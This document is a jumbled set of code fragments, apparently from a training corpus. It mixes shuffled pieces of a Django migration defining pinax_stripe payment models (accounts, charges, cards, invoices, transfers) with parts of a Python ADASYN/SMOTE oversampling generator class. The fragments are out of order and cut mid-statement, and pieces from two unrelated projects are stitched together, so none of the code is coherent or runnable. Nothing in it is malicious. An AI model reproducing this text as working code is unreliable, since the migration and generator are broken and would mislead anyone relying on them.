on_delete=django.db.models.deletion.CASCADE, related_name='transfers', to='pinax_stripe.Event')), ('stripe_account', models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Account')),", "], options={ 'abstract': False, }, ), migrations.CreateModel( name='Charge', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True,", "('kind', models.CharField(max_length=150)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('transfer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='charge_fee_details', to='pinax_stripe.Transfer')), ], options={ 'abstract': False, },", "models.CharField(max_length=255)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('amount', models.DecimalField(decimal_places=2, max_digits=9)), ('currency', models.CharField(default='usd', max_length=10)), ('kind', models.CharField(blank=True, max_length=25)), ('period_start',", "models.BooleanField(default=False)), ('charge_created', models.DateTimeField(blank=True, null=True)), ('available', models.BooleanField(default=False)), ('available_on', models.DateTimeField(blank=True, null=True)), ('fee', models.DecimalField(blank=True, decimal_places=2, max_digits=9,", "('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('amount', models.DecimalField(decimal_places=2, max_digits=9)),", "('statement_descriptor', models.TextField(blank=True)), ('trial_period_days', models.IntegerField(blank=True, null=True)), ('metadata', jsonfield.fields.JSONField(blank=True, null=True)), ('stripe_account', models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.CASCADE,", "to='pinax_stripe.Account')), ('customer', 
models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='user_accounts', related_query_name='user_account', to='pinax_stripe.Customer')), ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='user_accounts', related_query_name='user_account', to=settings.AUTH_USER_MODEL)), ], ),", "('paid', models.BooleanField(default=False)), ('receipt_number', models.TextField(blank=True)), ('period_end', models.DateTimeField()), ('period_start', models.DateTimeField()), ('subtotal', models.DecimalField(decimal_places=2, max_digits=9)), ('tax', models.DecimalField(blank=True,", "'abstract': False, }, bases=(pinax.stripe.models.StripeAccountFromCustomerMixin, models.Model), ), migrations.CreateModel( name='InvoiceItem', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True,", "models.IntegerField(blank=True, null=True)), ('invoice', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='items', to='pinax_stripe.Invoice')), ], options={ 'abstract': False, }, ), migrations.CreateModel(", "null=True)), ('kind', models.CharField(max_length=150)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('transfer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='charge_fee_details', to='pinax_stripe.Transfer')), ], options={ 'abstract': False,", "to='pinax_stripe.Plan'), ), migrations.AddField( model_name='invoiceitem', name='subscription', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Subscription'), ), migrations.AddField( model_name='invoice', name='subscription',", "('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('amount_off', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('currency', models.CharField(default='usd', max_length=10)),", 
"models.CharField(max_length=4)), ('metadata', jsonfield.fields.JSONField(blank=True, null=True)), ('routing_number', models.TextField()), ('status', models.TextField()), ('account', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='bank_accounts', to='pinax_stripe.Account')), ],", "('interval', models.CharField(max_length=15)), ('interval_count', models.IntegerField()), ('name', models.CharField(max_length=150)), ('statement_descriptor', models.TextField(blank=True)), ('trial_period_days', models.IntegerField(blank=True, null=True)), ('metadata', jsonfield.fields.JSONField(blank=True,", "name='TransferChargeFee', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('amount', models.DecimalField(decimal_places=2, max_digits=9)), ('currency', models.CharField(default='usd', max_length=10)),", "on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Plan'), ), migrations.AddField( model_name='invoiceitem', name='subscription', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Subscription'), ), migrations.AddField( model_name='invoice',", "('exp_month', models.IntegerField()), ('exp_year', models.IntegerField()), ('funding', models.CharField(max_length=15)), ('last4', models.CharField(blank=True, max_length=4)), ('fingerprint', models.TextField()), ], options={", "('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('business_name', models.TextField(blank=True, null=True)), ('business_url', models.TextField(blank=True, null=True)), ('charges_enabled', models.BooleanField(default=False)), ('country', models.CharField(max_length=2)), ('debit_negative_balances',", "('period_start', models.DateTimeField()), ('period_end', models.DateTimeField()), ('proration', models.BooleanField(default=False)), ('line_type', models.CharField(max_length=50)), ('description', models.CharField(blank=True, max_length=200)), 
('quantity', models.IntegerField(blank=True,", "('currency', models.CharField(default='usd', max_length=10)), ('description', models.TextField(blank=True)), ('email', models.TextField(blank=True)), ('filled', models.BooleanField(default=False)), ('inbound_address', models.TextField(blank=True)), ('payment', models.TextField(blank=True)),", "('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('name', models.TextField(blank=True)), ('address_line_1',", "('user', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='stripe_accounts', to=settings.AUTH_USER_MODEL)), ], options={ 'abstract': False, }, ), migrations.CreateModel(", "migrations.CreateModel( name='BankAccount', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)),", "to='pinax_stripe.Plan')), ], options={ 'abstract': False, }, bases=(pinax.stripe.models.StripeAccountFromCustomerMixin, models.Model), ), migrations.CreateModel( name='Transfer', fields=[ ('id',", "('legal_entity_address_state', models.TextField(blank=True, null=True)), ('legal_entity_dob', models.DateField(blank=True, null=True)), ('legal_entity_first_name', models.TextField(blank=True, null=True)), ('legal_entity_gender', models.TextField(blank=True, null=True)), ('legal_entity_last_name',", "models.IntegerField()), ('start', models.DateTimeField()), ('status', models.CharField(max_length=25)), ('trial_end', models.DateTimeField(blank=True, null=True)), ('trial_start', models.DateTimeField(blank=True, null=True)), ('customer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE,", "models.TextField(blank=True)), ('country', 
models.CharField(blank=True, max_length=2)), ('cvc_check', models.CharField(blank=True, max_length=15)), ('dynamic_last4', models.CharField(blank=True, max_length=4)), ('tokenization_method', models.CharField(blank=True, max_length=15)),", "models.TextField(blank=True, null=True)), ('outcome', jsonfield.fields.JSONField(blank=True, null=True)), ], options={ 'abstract': False, }, bases=(pinax.stripe.models.StripeAccountFromCustomerMixin, models.Model), ),", "null=True)), ('type', models.TextField(blank=True, null=True)), ('metadata', jsonfield.fields.JSONField(blank=True, null=True)), ('stripe_publishable_key', models.CharField(blank=True, max_length=100, null=True)), ('product_description', models.TextField(blank=True,", "('exp_year', models.IntegerField()), ('funding', models.CharField(max_length=15)), ('last4', models.CharField(blank=True, max_length=4)), ('fingerprint', models.TextField()), ], options={ 'abstract': False,", "models.TextField(blank=True, null=True)), ('metadata', jsonfield.fields.JSONField(blank=True, null=True)), ('stripe_publishable_key', models.CharField(blank=True, max_length=100, null=True)), ('product_description', models.TextField(blank=True, null=True)), ('statement_descriptor',", "max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('account_balance', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)),", "('validated_message', jsonfield.fields.JSONField(blank=True, null=True)), ('valid', models.NullBooleanField()), ('processed', models.BooleanField(default=False)), ('request', models.CharField(blank=True, max_length=100)), ('pending_webhooks', models.PositiveIntegerField(default=0)), ('api_version',", "('address_line_1', models.TextField(blank=True)), ('address_line_1_check', models.CharField(max_length=15)), ('address_line_2', models.TextField(blank=True)), ('address_city', 
models.TextField(blank=True)), ('address_state', models.TextField(blank=True)), ('address_country', models.TextField(blank=True)), ('address_zip',", "('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('source', models.CharField(blank=True, max_length=100)), ('currency', models.CharField(default='usd', max_length=10)), ('amount', models.DecimalField(blank=True,", "null=True)), ('payout_schedule_delay_days', models.PositiveSmallIntegerField(blank=True, null=True)), ('payout_schedule_interval', models.CharField(blank=True, choices=[('Manual', 'manual'), ('Daily', 'daily'), ('Weekly', 'weekly'), ('Monthly',", "('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('active', models.BooleanField(default=False)), ('amount', models.DecimalField(decimal_places=2, max_digits=9)), ('amount_received', models.DecimalField(decimal_places=2, default=Decimal('0'),", "models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='charge_fee_details', to='pinax_stripe.Transfer')), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='UserAccount', fields=[ ('id',", "decimal_places=2, max_digits=9, null=True)), ('currency', models.CharField(default='usd', max_length=10)), ('duration', models.CharField(default='once', max_length=10)), ('duration_in_months', models.PositiveIntegerField(blank=True, null=True)), ('livemode',", "models.TextField(blank=True)), ('refund_address', models.TextField(blank=True)), ('uncaptured_funds', models.BooleanField(default=False)), ('used_for_payment', models.BooleanField(default=False)), ], options={ 'abstract': False, }, ),", "null=True)), ('percent_off', models.PositiveIntegerField(blank=True, null=True)), ('redeem_by', models.DateTimeField(blank=True, null=True)), ('times_redeemed', models.PositiveIntegerField(blank=True, null=True)), ('valid', 
models.BooleanField(default=False)), ],", "null=True)), ('fee', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('fee_currency', models.CharField(blank=True, max_length=10, null=True)), ('transfer_group', models.TextField(blank=True, null=True)),", "default=None, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Account')), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='TransferChargeFee', fields=[", "from decimal import Decimal from django.conf import settings from django.db import migrations, models", "}, ), migrations.CreateModel( name='Event', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)),", "decimal_places=2, max_digits=9, null=True)), ('created', models.DateTimeField(blank=True, null=True)), ('currency', models.CharField(default='usd', max_length=25)), ('date', models.DateTimeField()), ('description', models.TextField(blank=True,", "max_length=100)), ('customer', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Customer')), ('stripe_account', models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Account')), ],", "('legal_entity_dob', models.DateField(blank=True, null=True)), ('legal_entity_first_name', models.TextField(blank=True, null=True)), ('legal_entity_gender', models.TextField(blank=True, null=True)), ('legal_entity_last_name', models.TextField(blank=True, null=True)), ('legal_entity_maiden_name',", "models.TextField(blank=True, null=True)), ('legal_entity_personal_id_number_provided', models.BooleanField(default=False)), ('legal_entity_phone_number', models.TextField(blank=True, null=True)), ('legal_entity_ssn_last_4_provided', models.BooleanField(default=False)), ('legal_entity_type', models.TextField(blank=True, null=True)), 
('legal_entity_verification_details',", "('dynamic_last4', models.CharField(blank=True, max_length=4)), ('tokenization_method', models.CharField(blank=True, max_length=15)), ('exp_month', models.IntegerField()), ('exp_year', models.IntegerField()), ('funding', models.CharField(max_length=15)), ('last4',", "models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('data', models.TextField()), ('message', models.CharField(max_length=500)), ('traceback', models.TextField()), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('event',", "name='Invoice', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('amount_due',", "on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Subscription'), ), migrations.AddField( model_name='invoice', name='subscription', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Subscription'), ), migrations.AddField( model_name='customer',", "models.DateField(blank=True, null=True)), ('legal_entity_first_name', models.TextField(blank=True, null=True)), ('legal_entity_gender', models.TextField(blank=True, null=True)), ('legal_entity_last_name', models.TextField(blank=True, null=True)), ('legal_entity_maiden_name', models.TextField(blank=True,", "migrations.CreateModel( name='Customer', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)),", "('source_transaction', models.TextField(blank=True, null=True)), ('source_type', models.TextField(blank=True, null=True)), ('statement_descriptor', models.TextField(blank=True, null=True)), ('status', 
models.CharField(max_length=25)), ('transfer_group', models.TextField(blank=True,", "models.CharField(default='usd', max_length=10)), ('closed', models.BooleanField(default=False)), ('description', models.TextField(blank=True)), ('paid', models.BooleanField(default=False)), ('receipt_number', models.TextField(blank=True)), ('period_end', models.DateTimeField()), ('period_start',", "name='Plan', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('amount', models.DecimalField(decimal_places=2,", "('legal_entity_phone_number', models.TextField(blank=True, null=True)), ('legal_entity_ssn_last_4_provided', models.BooleanField(default=False)), ('legal_entity_type', models.TextField(blank=True, null=True)), ('legal_entity_verification_details', models.TextField(blank=True, null=True)), ('legal_entity_verification_details_code', models.TextField(blank=True,", "jsonfield.fields.JSONField(blank=True, null=True)), ('authorized', models.BooleanField(default=True)), ('user', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='stripe_accounts', to=settings.AUTH_USER_MODEL)), ], options={ 'abstract':", "('date', models.DateTimeField()), ('webhooks_delivered_at', models.DateTimeField(blank=True, null=True)), ('charge', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='invoices', to='pinax_stripe.Charge')), ('customer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE,", "('kind', models.CharField(blank=True, max_length=25)), ('period_start', models.DateTimeField()), ('period_end', models.DateTimeField()), ('proration', models.BooleanField(default=False)), ('line_type', models.CharField(max_length=50)), ('description', models.CharField(blank=True,", "('trial_start', models.DateTimeField(blank=True, 
null=True)), ('customer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Customer')), ('plan', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Plan')), ], options={ 'abstract': False,", "models.CharField(blank=True, max_length=4)), ('tokenization_method', models.CharField(blank=True, max_length=15)), ('exp_month', models.IntegerField()), ('exp_year', models.IntegerField()), ('funding', models.CharField(max_length=15)), ('last4', models.CharField(blank=True,", "unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('account_holder_name', models.TextField()), ('account_holder_type', models.TextField()), ('bank_name', models.TextField(blank=True, null=True)), ('country', models.TextField()), ('currency',", "'daily'), ('Weekly', 'weekly'), ('Monthly', 'monthly')], max_length=7, null=True)), ('payout_schedule_monthly_anchor', models.PositiveSmallIntegerField(blank=True, null=True)), ('payout_schedule_weekly_anchor', models.TextField(blank=True, null=True)),", "('currency', models.CharField(default='usd', max_length=25)), ('date', models.DateTimeField()), ('description', models.TextField(blank=True, null=True)), ('destination', models.TextField(blank=True, null=True)), ('destination_payment', models.TextField(blank=True,", "models.TextField()), ('status', models.TextField()), ('account', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='bank_accounts', to='pinax_stripe.Account')), ], options={ 'abstract': False, }, ),", "models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('source', models.CharField(blank=True, max_length=100)), ('currency',", "models.CharField(blank=True, max_length=4)), ('fingerprint', models.TextField()), ], options={ 'abstract': False, }, ), 
migrations.CreateModel( name='Charge', fields=[", "name='users', field=models.ManyToManyField(related_name='customers', related_query_name='customers', through='pinax_stripe.UserAccount', to=settings.AUTH_USER_MODEL), ), migrations.AddField( model_name='charge', name='customer', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='charges',", "('date_purged', models.DateTimeField(blank=True, editable=False, null=True)), ('stripe_account', models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Account')), ('user', models.OneToOneField(blank=True, null=True,", "= [ migrations.CreateModel( name='Account', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)),", "('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('amount_due', models.DecimalField(decimal_places=2, max_digits=9)), ('attempted', models.NullBooleanField()), ('attempt_count', models.PositiveIntegerField(blank=True, null=True)),", "null=True)), ('description', models.TextField(blank=True)), ('paid', models.NullBooleanField()), ('disputed', models.NullBooleanField()), ('refunded', models.NullBooleanField()), ('captured', models.NullBooleanField()), ('receipt_sent', models.BooleanField(default=False)),", "max_length=10)), ('duration', models.CharField(default='once', max_length=10)), ('duration_in_months', models.PositiveIntegerField(blank=True, null=True)), ('livemode', models.BooleanField(default=False)), ('max_redemptions', models.PositiveIntegerField(blank=True, null=True)), ('metadata',", "models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Plan')), ], options={ 'abstract': False, }, bases=(pinax.stripe.models.StripeAccountFromCustomerMixin, models.Model), ), 
migrations.CreateModel( name='Transfer', fields=[", "models.CharField(blank=True, max_length=15)), ('dynamic_last4', models.CharField(blank=True, max_length=4)), ('tokenization_method', models.CharField(blank=True, max_length=15)), ('exp_month', models.IntegerField()), ('exp_year', models.IntegerField()), ('funding',", "models.CharField(blank=True, default='usd', max_length=10)), ('delinquent', models.BooleanField(default=False)), ('default_source', models.TextField(blank=True)), ('date_purged', models.DateTimeField(blank=True, editable=False, null=True)), ('stripe_account', models.ForeignKey(blank=True,", "models.DateTimeField(blank=True, null=True)), ('customer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Customer')), ('plan', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Plan')), ], options={ 'abstract': False, },", "bases=(pinax.stripe.models.StripeAccountFromCustomerMixin, models.Model), ), migrations.CreateModel( name='InvoiceItem', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=255)),", "models.BooleanField(default=False)), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='Card', fields=[ ('id', models.CharField(editable=False, max_length=32,", "('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('account_balance', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('currency', models.CharField(blank=True, default='usd', max_length=10)), ('delinquent', models.BooleanField(default=False)),", "models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Account')), ('user', models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)), ], options={ 'abstract':", "fields=[ ('id', models.CharField(editable=False, 
max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('amount', models.DecimalField(decimal_places=2, max_digits=9)),", "max_digits=9, null=True)), ('fee_currency', models.CharField(blank=True, max_length=10, null=True)), ('transfer_group', models.TextField(blank=True, null=True)), ('outcome', jsonfield.fields.JSONField(blank=True, null=True)), ],", "('description', models.TextField(blank=True)), ('email', models.TextField(blank=True)), ('filled', models.BooleanField(default=False)), ('inbound_address', models.TextField(blank=True)), ('payment', models.TextField(blank=True)), ('refund_address', models.TextField(blank=True)), ('uncaptured_funds',", "('quantity', models.IntegerField(blank=True, null=True)), ('invoice', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='items', to='pinax_stripe.Invoice')), ], options={ 'abstract': False, }, ),", "models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('account', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='user_accounts', related_query_name='user_account', to='pinax_stripe.Account')), ('customer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='user_accounts', related_query_name='user_account',", "max_length=10)), ('description', models.TextField(blank=True)), ('email', models.TextField(blank=True)), ('filled', models.BooleanField(default=False)), ('inbound_address', models.TextField(blank=True)), ('payment', models.TextField(blank=True)), ('refund_address', models.TextField(blank=True)),", "null=True)), ('legal_entity_address_country', models.TextField(blank=True, null=True)), ('legal_entity_address_line1', models.TextField(blank=True, null=True)), ('legal_entity_address_line2', models.TextField(blank=True, null=True)), ('legal_entity_address_postal_code', 
models.TextField(blank=True, null=True)),", "models.DateTimeField(blank=True, null=True)), ('current_period_start', models.DateTimeField(blank=True, null=True)), ('ended_at', models.DateTimeField(blank=True, null=True)), ('quantity', models.IntegerField()), ('start', models.DateTimeField()), ('status',", "unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('amount_due', models.DecimalField(decimal_places=2, max_digits=9)), ('attempted', models.NullBooleanField()), ('attempt_count', models.PositiveIntegerField(blank=True, null=True)), ('statement_descriptor', models.TextField(blank=True)),", "migrations.AddField( model_name='card', name='customer', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Customer'), ), migrations.AddField( model_name='bitcoinreceiver', name='customer', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Customer'), ), migrations.AlterUniqueTogether(", "('decline_charge_on_cvc_failure', models.BooleanField(default=False)), ('default_currency', models.CharField(max_length=3)), ('details_submitted', models.BooleanField(default=False)), ('display_name', models.TextField(blank=True, null=True)), ('email', models.TextField(blank=True, null=True)), ('legal_entity_address_city',", "null=True)), ('invoice', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='items', to='pinax_stripe.Invoice')), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='Plan',", "('address_state', models.TextField(blank=True)), ('address_country', models.TextField(blank=True)), ('address_zip', models.TextField(blank=True)), ('address_zip_check', models.CharField(max_length=15)), ('brand', models.TextField(blank=True)), ('country', models.CharField(blank=True, max_length=2)),", "('last4', models.CharField(blank=True, max_length=4)), ('fingerprint', models.TextField()), ], options={ 'abstract': False, }, ), 
migrations.CreateModel( name='Charge',", "('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=255)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('amount', models.DecimalField(decimal_places=2, max_digits=9)), ('currency',", "name='customer', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='charges', to='pinax_stripe.Customer'), ), migrations.AddField( model_name='charge', name='invoice', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE,", "models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Account')), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='EventProcessingException',", "models.CharField(blank=True, max_length=25)), ('period_start', models.DateTimeField()), ('period_end', models.DateTimeField()), ('proration', models.BooleanField(default=False)), ('line_type', models.CharField(max_length=50)), ('description', models.CharField(blank=True, max_length=200)),", "primary_key=True, serialize=False)), ('account', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='user_accounts', related_query_name='user_account', to='pinax_stripe.Account')), ('customer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='user_accounts', related_query_name='user_account', to='pinax_stripe.Customer')), ('user',", "to='pinax_stripe.Account')), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='EventProcessingException', fields=[ ('id', models.CharField(editable=False, max_length=32,", "'abstract': False, }, ), migrations.CreateModel( name='Plan', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id',", "on_delete=django.db.models.deletion.CASCADE, 
to='pinax_stripe.Account')), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='EventProcessingException', fields=[ ('id', models.CharField(editable=False,", "('customer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Customer')), ('plan', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Plan')), ], options={ 'abstract': False, }, bases=(pinax.stripe.models.StripeAccountFromCustomerMixin, models.Model)," ]
[ "parknn = min(5, n_samples, self.X_.shape[0]) Xnew, y = SMOTE(sampling_strategy = parss, k_neighbors =", "return self.mname_ # ============================================================================= # # TEST # # from sklearn.datasets import make_classification", "import matplotlib.pyplot as plt # plt.scatter(X[:,0], X[:,1]) # # ada_gen = Gen_adasyn() #", "SMOTE parknn = min(5, n_samples, self.X_.shape[0]) Xnew, y = SMOTE(sampling_strategy = parss, k_neighbors", "# # from sklearn.datasets import make_classification # X, y = make_classification(n_samples = 100,", "sklearn.datasets import make_classification # X, y = make_classification(n_samples = 100, n_features = 2,", "TODO Inspect while type(Xnew) is not np.ndarray and parknn <= n_samples and parknn", "y) except (ValueError, RuntimeError): parknn = parknn * 2 if type(Xnew) is not", "# ada_gen.fit(X) # df = ada_gen.sample(n_samples = 201) # plt.scatter(df[:,0], df[:,1]) # =============================================================================", "= min(5, n_samples, self.X_.shape[0]) # TODO Inspect while type(Xnew) is not np.ndarray and", "y) self.mname_ = \"adasyns\" else: self.mname_ = \"adasyn\" return Xnew[y == 1,:][0:n_samples,:] def", "= \"adasyn\" return Xnew[y == 1,:][0:n_samples,:] def my_name(self): return self.mname_ # ============================================================================= #", "of observations in train\") parss = 'all' y = np.ones(self.X_.shape[0]), np.zeros(n_samples) y =", "# # TEST # # from sklearn.datasets import make_classification # X, y =", "# # ada_gen = Gen_adasyn() # ada_gen.fit(X) # df = ada_gen.sample(n_samples = 201)", "'not majority' if self.X_.shape[0] > n_samples: warnings.warn(\"The required sample size is smaller than", "= 'not majority' if self.X_.shape[0] > n_samples: warnings.warn(\"The required sample size is smaller", "ADASYN import warnings from src.generators.rand import Gen_randu class Gen_adasyn: def __init__(self): self.X_ =", "parss, 
k_neighbors = parknn, random_state = 2020).fit_resample(X, y) self.mname_ = \"adasyns\" else: self.mname_", "random_state = 2020).fit_resample(X, y) self.mname_ = \"adasyns\" else: self.mname_ = \"adasyn\" return Xnew[y", "<reponame>Arzik1987/prelim import numpy as np from imblearn.over_sampling import ADASYN import warnings from src.generators.rand", "= 2020).fit_resample(X, y) self.mname_ = \"adasyns\" else: self.mname_ = \"adasyn\" return Xnew[y ==", "============================================================================= # # TEST # # from sklearn.datasets import make_classification # X, y", "X, y = make_classification(n_samples = 100, n_features = 2, n_informative = 2, #", "X, y=None, metamodel=None): self.X_ = X.copy() return self def sample(self, n_samples=1): parss =", "class Gen_adasyn: def __init__(self): self.X_ = None self.mname_ = \"adasyn\" def fit(self, X,", "self.X_.shape[0] > n_samples: warnings.warn(\"The required sample size is smaller than the number of", "= 2, n_informative = 2, # n_redundant = 0, n_repeated = 0, n_classes", "sample size is smaller than the number of observations in train\") parss =", "sample(self, n_samples=1): parss = 'not majority' if self.X_.shape[0] > n_samples: warnings.warn(\"The required sample", "from imblearn.over_sampling import ADASYN import warnings from src.generators.rand import Gen_randu class Gen_adasyn: def", "ADASYN(sampling_strategy = parss, n_neighbors = parknn, random_state = 2020).fit_resample(X, y) except (ValueError, RuntimeError):", "metamodel=None): self.X_ = X.copy() return self def sample(self, n_samples=1): parss = 'not majority'", "n_repeated = 0, n_classes = 1, # random_state = 0) # import matplotlib.pyplot", "# TEST # # from sklearn.datasets import make_classification # X, y = make_classification(n_samples", "# from sklearn.datasets import make_classification # X, y = make_classification(n_samples = 100, n_features", "self.X_.shape[0]) Xnew, y = SMOTE(sampling_strategy = parss, k_neighbors 
= parknn, random_state = 2020).fit_resample(X,", "# random_state = 0) # import matplotlib.pyplot as plt # plt.scatter(X[:,0], X[:,1]) #", "number of observations in train\") parss = 'all' y = np.ones(self.X_.shape[0]), np.zeros(n_samples) y", "from imblearn.over_sampling import SMOTE parknn = min(5, n_samples, self.X_.shape[0]) Xnew, y = SMOTE(sampling_strategy", "Inspect while type(Xnew) is not np.ndarray and parknn <= n_samples and parknn <=", "my_name(self): return self.mname_ # ============================================================================= # # TEST # # from sklearn.datasets import", "import warnings from src.generators.rand import Gen_randu class Gen_adasyn: def __init__(self): self.X_ = None", "parknn, random_state = 2020).fit_resample(X, y) self.mname_ = \"adasyns\" else: self.mname_ = \"adasyn\" return", "is smaller than the number of observations in train\") parss = 'all' y", "= ADASYN(sampling_strategy = parss, n_neighbors = parknn, random_state = 2020).fit_resample(X, y) except (ValueError,", "self def sample(self, n_samples=1): parss = 'not majority' if self.X_.shape[0] > n_samples: warnings.warn(\"The", "parss = 'not majority' if self.X_.shape[0] > n_samples: warnings.warn(\"The required sample size is", "ada_gen = Gen_adasyn() # ada_gen.fit(X) # df = ada_gen.sample(n_samples = 201) # plt.scatter(df[:,0],", "y = SMOTE(sampling_strategy = parss, k_neighbors = parknn, random_state = 2020).fit_resample(X, y) self.mname_", "\"adasyns\" else: self.mname_ = \"adasyn\" return Xnew[y == 1,:][0:n_samples,:] def my_name(self): return self.mname_", "imblearn.over_sampling import ADASYN import warnings from src.generators.rand import Gen_randu class 